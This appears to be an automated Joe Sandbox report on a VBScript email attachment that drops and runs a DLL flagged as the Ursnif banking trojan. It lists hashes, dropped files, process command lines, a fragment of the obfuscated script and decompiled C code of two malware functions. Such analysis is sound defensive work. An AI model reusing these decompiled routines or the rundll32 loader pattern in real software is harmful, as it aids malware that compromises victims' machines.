Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Attachment_32954.vbs	37%	Virustotal		Browse
Attachment_32954.vbs	17%	Metadefender		Browse
Attachment_32954.vbs	31%	ReversingLabs	Script-WScript.Trojan.Banker

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Rabin.dmg	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Rabin.dmg	25%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Rabin.dmg	72%	ReversingLabs	Win32.Trojan.Tnega

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
20.2.rundll32.exe.dc0000.2.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	384531
Start date:	09.04.2021
Start time:	11:43:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Attachment_32954.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winVBS@5/8@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 13.2% (good quality ratio 12.6%) Quality average: 79.3% Quality standard deviation: 28.1%
HCA Information:	Successful, ratio: 58% Number of executed functions: 39 Number of non-executed functions: 91
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:45:04	API Interceptor	1x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Rabin.dmg	documentation_07531.vbs	Get hash	malicious	Browse
	documentation_27396.vbs	Get hash	malicious	Browse
	info_70397.vbs	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Brewster.m4 Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.3893648586343925
Encrypted:	false
SSDEEP:	3:jRU/8UElCKe:iEUK8
MD5:	7D9E8C8A31E5DB74A019F387558C2FD7
SHA1:	9F8F21F043CB5CC1B5002F82A3CCD1083074B037
SHA-256:	BF886F8F2A23CF7B8A25DF52438692C14D022409F1D930286ABA34528D64A608
SHA-512:	A076D94E35DD074175A4F48591F7019AE2D71A0A38D56D26A4534758ECECE7E0737F7150950C32DC9B41748CCA31586559FEAA92C3948B9FD45B6C093AC44E33
Malicious:	false
Reputation:	low
Preview:	IgVZEJelgrVSfRAmJyAqahtJlgbdyun

C:\Users\user\AppData\Local\Temp\Rabin.dmg Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	463360
Entropy (8bit):	6.845616079385091
Encrypted:	false
SSDEEP:	12288:OycGIk5DHw+cppnabV/1XsiXhIbK7boMXBiu7ivtv6g:OycGIPObV/18iVboQWv6
MD5:	B1FC7DC75445A016588402757FDD6FF6
SHA1:	12AA8A932E6711BECA796F67E717523D6794DE9E
SHA-256:	94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
SHA-512:	5EA1A7E0D938ED772AB59C486CA6D018814082E50BD000AAFAFD43929983244875792C958A4BDA8B12EDEA1888392C98C33BB26D2D3AFB1A037E1074B6ED9675
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 51%, Browse Antivirus: Metadefender, Detection: 25%, Browse Antivirus: ReversingLabs, Detection: 72%
Joe Sandbox View:	Filename: documentation_07531.vbs, Detection: malicious, Browse Filename: documentation_27396.vbs, Detection: malicious, Browse Filename: info_70397.vbs, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T@`...........!.................?....................................................@.............................\...L...P...............................@...4...T...............................@...............h............................text...L........................... ..`.rdata..j%.......&..................@..@.data...p...........................@....rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\alleyway.xlsx Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	5.163574463632383
Encrypted:	false
SSDEEP:	3:3s9Lk3Z0yVQKd7OD9BBYh5u0y2WTH:3cLk3Z0slGcy2U
MD5:	77EC729601A3992F484FACC6097DEE11
SHA1:	417311EE6DC848D66E47B8E68B8F9C532AC5C79F
SHA-256:	E0E14AAFC65AF3F390D75AFF8C88FBDF7A0BF133E9F12D17E5711F4045A5C9D5
SHA-512:	F021B44ED6762993538BE2EBA289D5774CBF9CB169459CD09064898D86005C14C69A06AAD5D21CEDC81DAA779154EB912E8EB82B9245763E5F5E2C05C8653650
Malicious:	false
Reputation:	low
Preview:	FAAkBTAIhXOUAMoireRLaHxWbPUlZalWstcYxWZvVPERfYbaTQdffXmYZltOOiDpvxWUqvHGWgEostPb

C:\Users\user\AppData\Local\Temp\assai.zip Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	320012
Entropy (8bit):	7.998324397637329
Encrypted:	true
SSDEEP:	6144:DjW4WXZnaeeoYkxXTNShIvZwxpMbL0dUgkiZRQ1gmW5bhCvKZSag:waebhNGew0AdcuRQpubgSZq
MD5:	2E2BF9A0EB9139B28F959A6F17BD939B
SHA1:	BBF80A40979FF77ADB4B73DECEF9330B739BB90F
SHA-256:	8D621174B93D66DF438F8D377D2147CF578F16949E12F1E10BA34A77385D5A7E
SHA-512:	AE1F1A6084196CE0D7DA9776E8A10131BE63B7607E06EFCBD463E0D943622933BD57A74588155AB35202B1D2814C6D737D4D19EC0A8CF287BCE16A5CAEF943F9
Malicious:	true
Reputation:	low
Preview:	PK..........oR...0............Rabin.dmg..TSM..\|........RD.........".@ .B .!....]....RTzS....w}.P.Qib..{..)..>..............3...3.....M... ..O(D.r........Z..y......-3..)LmFB\tBx.vD8....&....tm.]..g.vl\$i........3.xJ. ....b.......S.j..y".>.......-..U...D.YQ..'rK.%...1..Z.....>z:e.....%........!.H...D...d.....k..?...I.....g..X....!H....h#.a~Bd8+.A..%0...z.?......!.......l@....\...fB.._...m.._...O ....v..d....r..3......+.S....P....u...nt..X...7..-#....@R`e+.d^..7.........j..y..XYP...3.}.cF....I.{..Jd_Uu.....E..,..._!.,E......A.9H7I`..@.......2....P.A...j...##1Z,.S)OIGp_(../w.J....>...E6(2M..$..._\....<9..$.....w....A.\|O.2_"....9 dM....n..g+...q$.p.>O..[....2...-...>.S.W.....M..B......F.....?X...v......!:r...Nm<..P}..3..wW.....WY.x.-Ab.P.......jBu6ZN.EV.";......`.7P....k...D3/k..cA........~.?..E.......w...}.e...M..n.G...:..&.M8...<?.F.#.u..2..B.C9...xb..T.....BD.......,....gN..._..b.{.._...'....>....E......>Kg...2.)..g\.H.7.../...3....[._

C:\Users\user\AppData\Local\Temp\hoydenish.org Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.8637132757501895
Encrypted:	false
SSDEEP:	3:vtWa/9HxtBzIZiK5joL1Mn:4a/9HaZimoZM
MD5:	178F2DF82EACC4BFB097B53800DD1375
SHA1:	5111F35F8111DF87B683550680FA04B212BEA51C
SHA-256:	2107126604B4344372E6F55EC1C5236390D69CD244AD4E1D4EDB8897EB3CC80F
SHA-512:	463289625A13052368207D93EC8F022BE92306C90F81CAE3B7410EF8248379AB3174728C6B74B2B8ADC546FACD869179AF380F55A75C340AC4E93AB3E542EC03
Malicious:	false
Reputation:	low
Preview:	CSESLsOohjfXcRaNVoRPbbBTVdxxLlXEhmACpoKBizFzenfLTOLT

C:\Users\user\AppData\Local\Temp\lowboy.less Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	5.209234836510117
Encrypted:	false
SSDEEP:	3:3ccqAlDsLLHwwgvemfXKrhhHEXVn:3zlDsLLH/nHgVn
MD5:	1D15F444BCF2648DC0721083FFF8D015
SHA1:	58FEB5CFC3AF7DC5BAA8E59737E7FF06953AE6F2
SHA-256:	D5E8F55D13488EC247B6AA3DF73F58FDEB8B7B088ED880C1C4731DB360F76C29
SHA-512:	F1BA33F7F86692DAA5CAC7D012ACBB93FF8DFE581C42966D5BCACC94CADE98B82822476FC83AEE1AFF4FDCB93040CDBE55DC5987A4A2812EE6EEB521B7BB27E1
Malicious:	false
Preview:	xxRVgMoqKLNVcBafHUHjptDNknCInDxSEsRqLjuRcKmKaopdGWZzmuqNAboAxpobTjFJlipLqDnVvOPbcGxbp

C:\Users\user\AppData\Local\Temp\technic.deb Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.288909765557392
Encrypted:	false
SSDEEP:	3:Y2HsiH2LrKo:YpVT
MD5:	F06DAE621E9DB556BF77FE26AEE12EE6
SHA1:	6F4F0CF969553AD4F74560B622AD500E62964B75
SHA-256:	191D824852449377B2AF1880BB10BB9E3A2AC22113A1A4BA7CEF068432E3EF76
SHA-512:	4974C197CD4D628D7C87A93C1B9CB88E4D0746C37293E8BE0054198EBE08ED6188EBB040EC549CE22D82E1BC74C03EEB57EC222746B7BBB4A43ECCE7B6CC785E
Malicious:	false
Preview:	XfkDGDNSNCzbIzkpbUQtSiozaaTEjbKb

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.127338439609775
TrID:
File name:	Attachment_32954.vbs
File size:	1444626
MD5:	39eb3427fd329de93a19190d84273710
SHA1:	5d9009503b3500c0b6d35e272dd9160e9d873e46
SHA256:	adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
SHA512:	37f66cd5752fa5693c8132c9bfdc0c4df05c0a8a5fe5cf9ae686b848e1196b03fbbad52babfe2c10fb2a9ba7648748883a1727fa0f79ceb0906ec6283a1366ce
SSDEEP:	24576:yc/AM+84+NfRAwmcxvZ1RWB87cZ24PX/Hh/MEUUG1AXlvU2LDkhq5o8CqE:yc/v+84+NfRAwmcxvZ1RWB87cZ24PX/u
File Content Preview:	REM Etruria intemperate rage Berra gusty Angelo townsman Howell Muzak whether bespeak ..const prey = 11..const met = 33..fixate = Array(88,83,prey,capital,expatriate,8,8,8,harden,8,169,171,119,90,138,170,247,56,146,230,capital,8,8,retch,parkway,8,fiesta,8

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 5540 Parent PID: 3388

General

Start time:	11:43:59
Start date:	09/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
Imagebase:	0x7ff7b3850000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6488 Parent PID: 5540

General

Start time:	11:45:04
Start date:	09/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Imagebase:	0x7ff6a5f60000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4072 Parent PID: 6488

General

Start time:	11:45:04
Start date:	09/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
Imagebase:	0xfc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 4072 Parent PID: 6488 rundll32.exeCOMMON

Executed Functions

Function 00DC3512, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00DC3512(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xdcd22c; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xdcd1f0, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xdcd22c; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xdcd1f0, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xdcd1f0, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xdcd22c; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xdcd230; // 0x434a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xdce825; // 0x73797325
				_t83 = E00DCA590(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xdcd1f0, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xdcd230; // 0x434a5a8
				_t16 = _t93 + 0xdce846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16);
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00dc351b
0x00dc3521
0x00dc3523
0x00dc353d
0x00dc3541
0x00dc3544
0x00dc37b9
0x00dc37c0
0x00dc37c0
0x00dc354a
0x00dc355f
0x00dc3561
0x00dc3565
0x00dc3568
0x00dc37a9
0x00dc37b3
0x00000000
0x00dc37b3
0x00dc356e
0x00dc3579
0x00dc357e
0x00dc3583
0x00dc3586
0x00dc358d
0x00dc3594
0x00dc3597
0x00dc3799
0x00dc37a3
0x00000000
0x00dc37a3
0x00dc35ad
0x00dc35b1
0x00dc35b4
0x00dc35b7
0x00dc35bf
0x00dc35c2
0x00dc35cb
0x00dc35d1
0x00dc35db
0x00dc35e2
0x00dc35e2
0x00dc35f4
0x00dc35ff
0x00dc360d
0x00dc3612
0x00dc3617
0x00dc361a
0x00dc361f
0x00dc3629
0x00dc362c
0x00dc362f
0x00dc3645
0x00dc3649
0x00dc364c
0x00dc3797
0x00000000
0x00dc3797
0x00dc3663
0x00dc36b4
0x00dc3677
0x00dc367f
0x00dc3684
0x00dc3692
0x00dc369b
0x00dc36a4
0x00dc36a4
0x00dc36b2
0x00dc36b2
0x00dc36b8
0x00dc36bc
0x00dc36bc
0x00dc36c2
0x00000000
0x00000000
0x00dc36c4
0x00dc36ca
0x00dc3771
0x00dc3774
0x00dc3781
0x00dc3781
0x00dc3785
0x00000000
0x00000000
0x00dc377a
0x00dc377e
0x00dc377e
0x00dc3780
0x00dc3780
0x00dc378a
0x00dc3791
0x00dc3793
0x00000000
0x00dc3793
0x00dc36d0
0x00dc36d2
0x00dc36d2
0x00dc36e5
0x00dc36eb
0x00dc36f6
0x00dc36f8
0x00dc36fc
0x00dc36fe
0x00dc36fe
0x00dc3703
0x00dc3705
0x00dc3705
0x00dc3703
0x00dc370a
0x00dc370e
0x00dc370e
0x00dc371e
0x00dc3723
0x00dc3726
0x00dc3726
0x00dc3729
0x00dc3733
0x00dc373b
0x00dc3740
0x00dc374e
0x00dc374e
0x00dc3762
0x00dc3766
0x00dc3766

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00DCD2E0), ref: 00DC353D
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00DC355F
memset.NTDLL ref: 00DC3579

Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00DC3592,73797325), ref: 00DCA5A1
Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DCA5BB

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00DC35B7
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00DC35CB
CloseHandle.KERNEL32(?), ref: 00DC35E2
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00DC35EE
lstrcat.KERNEL32(?,642E2A5C), ref: 00DC362F
FindFirstFileA.KERNELBASE(?,?), ref: 00DC3645
CompareFileTime.KERNEL32(?,?), ref: 00DC3663
FindNextFileA.KERNELBASE(00DC70B5,?), ref: 00DC3677
FindClose.KERNEL32(00DC70B5), ref: 00DC3684
FindFirstFileA.KERNEL32(?,?), ref: 00DC3690
CompareFileTime.KERNEL32(?,?), ref: 00DC36B2
StrChrA.SHLWAPI(?,0000002E), ref: 00DC36E5
memcpy.NTDLL(00DC533C,?,00000000), ref: 00DC371E
FindNextFileA.KERNELBASE(00DC70B5,?), ref: 00DC3733
FindClose.KERNEL32(00DC70B5), ref: 00DC3740
FindFirstFileA.KERNEL32(?,?), ref: 00DC374C
CompareFileTime.KERNEL32(?,?), ref: 00DC375C
FindClose.KERNEL32(00DC70B5), ref: 00DC3791
HeapFree.KERNEL32(00000000,00DC533C,73797325), ref: 00DC37A3
HeapFree.KERNEL32(00000000,?), ref: 00DC37B3

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: 563374da71e2c65e7fd606abb81677110d207f4704ff6f55ff6e11d956b5401c
Instruction ID: 2db2e180d8ad06d633bd0e4e9da57dcfb83c81a53fa308a8c43da098e5f5fe24
Opcode Fuzzy Hash: 563374da71e2c65e7fd606abb81677110d207f4704ff6f55ff6e11d956b5401c
Instruction Fuzzy Hash: 4D8115B190020BEFDB119FA5DC84EEEBBB9FB48300F14416AE505E72A0D7319A459FB0

Uniqueness

Uniqueness Score: -1.00%

Function 7025116D, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E7025116D(intOrPtr _a4) {
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				long _v60;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				void* _t28;
				long _t31;
				long _t32;
				void* _t41;
				intOrPtr _t43;
				long _t48;
				intOrPtr _t49;
				signed int _t50;
				void* _t57;
				signed int _t61;
				void* _t63;
				intOrPtr* _t64;

				_t21 = E70251756();
				_v52 = _t21;
				if(_t21 != 0) {
					L21:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t50 = 9;
					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
					_t26 = E70251000(0, _t61); // executed
					_v56 = _t26;
					Sleep(_t61 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L21;
				}
				_t27 = E70252020(_t50); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L19:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L21;
				}
				if(_a4 != 0) {
					L11:
					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x7025414c, 0, 0); // executed
					_t63 = _t28;
					if(_t63 == 0) {
						L18:
						_v56 = GetLastError();
						goto L19;
					}
					_t31 = QueueUserAPC(E70251E8A, _t63,  &(_v44.wSecond)); // executed
					if(_t31 == 0) {
						_t48 = GetLastError();
						TerminateThread(_t63, _t48);
						CloseHandle(_t63);
						_t63 = 0;
						SetLastError(_t48);
					}
					if(_t63 == 0) {
						goto L18;
					} else {
						_t32 = WaitForSingleObject(_t63, 0xffffffff);
						_v60 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t63,  &_v60);
						}
						CloseHandle(_t63);
						goto L19;
					}
				}
				if(E70251CCA(_t50,  &_v48) != 0) {
					 *0x70254138 = 0;
					goto L11;
				}
				_t49 = _v48;
				_t64 = __imp__GetLongPathNameW;
				_t41 =  *_t64(_t49, 0, 0); // executed
				_t57 = _t41;
				if(_t57 == 0) {
					L9:
					 *0x70254138 = _t49;
					goto L11;
				}
				_t15 = _t57 + 2; // 0x2
				_t43 = E702519C2(_t57 + _t15);
				 *0x70254138 = _t43;
				if(_t43 == 0) {
					goto L9;
				}
				 *_t64(_t49, _t43, _t57); // executed
				E702515C4(_t49);
				goto L11;
			}

0x70251179
0x70251182
0x70251186
0x702512cc
0x702512d2
0x00000000
0x00000000
0x00000000
0x7025118c
0x7025118c
0x70251191
0x70251197
0x702511a6
0x702511a7
0x702511aa
0x702511ad
0x702511b6
0x702511ba
0x702511c0
0x702511c4
0x702511cb
0x00000000
0x00000000
0x702511d1
0x702511d8
0x702511dc
0x702512bd
0x702512bd
0x702512c4
0x702512c6
0x702512c6
0x00000000
0x702512c4
0x702511e5
0x70251238
0x7025124a
0x70251250
0x70251254
0x702512b3
0x702512b9
0x00000000
0x702512b9
0x70251261
0x7025126f
0x70251277
0x7025127b
0x70251282
0x70251285
0x70251287
0x70251287
0x7025128f
0x00000000
0x70251291
0x70251294
0x7025129c
0x702512a0
0x702512a8
0x702512a8
0x702512af
0x00000000
0x702512af
0x7025128f
0x702511f3
0x70251232
0x00000000
0x70251232
0x702511f5
0x702511f9
0x70251202
0x70251204
0x70251208
0x7025122a
0x7025122a
0x00000000
0x7025122a
0x7025120a
0x7025120f
0x70251216
0x7025121b
0x00000000
0x00000000
0x70251220
0x70251223
0x00000000

APIs

Part of subcall function 70251756: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,7025117E), ref: 70251765
Part of subcall function 70251756: GetVersion.KERNEL32(?,7025117E), ref: 70251774
Part of subcall function 70251756: GetCurrentProcessId.KERNEL32(?,7025117E), ref: 70251783
Part of subcall function 70251756: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,7025117E), ref: 7025179C

GetSystemTime.KERNEL32(?), ref: 70251191
SwitchToThread.KERNEL32 ref: 70251197

Part of subcall function 70251000: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251056
Part of subcall function 70251000: memcpy.NTDLL(?,702511B2,?,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 702510E8
Part of subcall function 70251000: VirtualFree.KERNELBASE(702511B2,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251103

Sleep.KERNELBASE(00000000,00000000), ref: 702511BA
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 70251202
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 70251220
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 7025124A
QueueUserAPC.KERNELBASE(70251E8A,00000000,?), ref: 70251261
GetLastError.KERNEL32 ref: 70251271
